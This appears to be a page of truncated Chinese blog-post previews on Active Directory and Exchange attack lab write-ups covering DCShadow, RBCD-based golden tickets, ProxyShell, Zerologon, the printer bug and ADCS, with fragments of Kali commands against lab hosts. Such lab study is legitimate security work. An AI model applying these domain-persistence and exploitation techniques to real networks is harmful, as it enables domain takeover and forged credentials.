具有管理员权限的攻击者创建一个恶意的域控,利用域控间正常同步数据的功能,将对象同步到恶意域控,实现域权限维权。 一、原理 活动目录是一个依赖于域控的服务,并于其他域控默认每15分钟使用运行在NTDS上名为KCC的服务进行同步。 1、在活动目录中新增域控 在活动目录中通过一些特殊的对象和一定的数据层级
假设被委派的服务B为krbtgt,而服务A是我们控制的一个服务账户或机器账户。配置服务A到服务B的RBCD,那么我们控制的账户就可以获得KDC服务的ST了(也就是TGT)。 获得KDC的ST后,就可以伪造任何权限用户的TGT,以此打造变种的黄金票据。 一、选择控制的用户 服务A可以是以下几类: 已经
一、黄金票据传递攻击 在Kerberos认证过程的AS-REP阶段,经过预认证后,KDC返回的TGT中加密部分authorization-data是使用krbtgt密钥加密的,而该部分存放着代表用户的PAC。 当获得了域内用户krbtgt的密钥值,就能够伪造高权限PAC,然后将其封装在TGT中。使用
(base) ┌──(root㉿Kali)-[~/tools/proxyshell-auto] └─# python3 proxyshell.py -t exchange3.sec.local fqdn exchange3.sec.local + Administrator@sec.local le
exchange 2016 cu18 https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-26855 https://github.com/Udyz/Proxylogon (base) ┌──(root㉿Kali)-[~/to
注:后面需要补全全部实验 (6)S4u2Self带pac 创建机器账户machine6$ (base) ┌──(root㉿Kali)-[~] └─# /root/.local/bin/addcomputer.py -computer-name 'machine6$' -computer-pass '
一、ADCS 微软活动目录证书服务 二、基础知识 1、PKI PKI(Public Key Infrastructure,公钥基础设施)是一种用于管理数字证书和加密密钥的框架,旨在提供安全的通信、身份验证和数据加密。它基于公钥加密体系,使用一对密钥(公钥和私钥)来确保信息传输的安全。 ADCS是对P
1、检测是否存在漏洞 (base) ┌──(root㉿Kali)-[~] └─# rpcdump.py @10.10.4.8|grep MS-RPRN Protocol: [MS-RPRN]: Print System Remote Protocol (base) ┌──(root㉿Kali)-[
1、Python脚本复现 (1)检测漏洞 (base) ┌──(root㉿Kali)-[~/tools/CVE-2020-1472] └─# python3 zerologon_tester.py WIN2019-DC3 10.10.4.8 Performing authentication att
影响范围:https://nsfocusglobal.com/windows-ntlm-tampering-vulnerability-cve-2019-1040-threat-alert/ 一、漏洞复现 1、Exchange 域控:10.10.4.8 Exchange服务器:10.10.4.5 在